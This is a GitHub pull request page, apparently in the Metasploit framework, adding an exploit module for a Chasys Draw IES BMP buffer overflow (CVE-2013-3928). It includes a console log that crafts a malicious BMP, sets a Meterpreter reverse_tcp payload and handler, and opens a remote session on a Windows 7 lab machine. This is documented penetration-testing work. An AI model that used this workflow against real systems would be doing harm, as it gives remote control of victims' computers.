Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module for CVE-2013-3928 #2214

Merged
merged 1 commit into from Aug 13, 2013
Merged

Add module for CVE-2013-3928 #2214

merged 1 commit into from Aug 13, 2013

Conversation

jvazquez-r7
Copy link
Contributor

Tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7 SP1.

msf exploit(chasys_draw_ies_bmp_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(chasys_draw_ies_bmp_bof) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(chasys_draw_ies_bmp_bof) > rexploit
[*] Reloading module...

[+] msf.bmp stored at /Users/juan/.msf4/local/msf.bmp
msf exploit(chasys_draw_ies_bmp_bof) > use exploit/multi/handler 
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.172
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.172:49163) at 2013-08-12 17:16:11 -0500

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

wchen-r7 added a commit that referenced this pull request Aug 13, 2013
@wchen-r7
Land #2214 - CVE-2013-3928: Chasys Draw IES Buffer Overflow
c0335ce
@wchen-r7 wchen-r7 merged commit b3f229f into rapid7:master Aug 13, 2013
@jvazquez-r7 jvazquez-r7 deleted the chasys_draw_ies_bmp_bof branch November 18, 2014 15:45
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7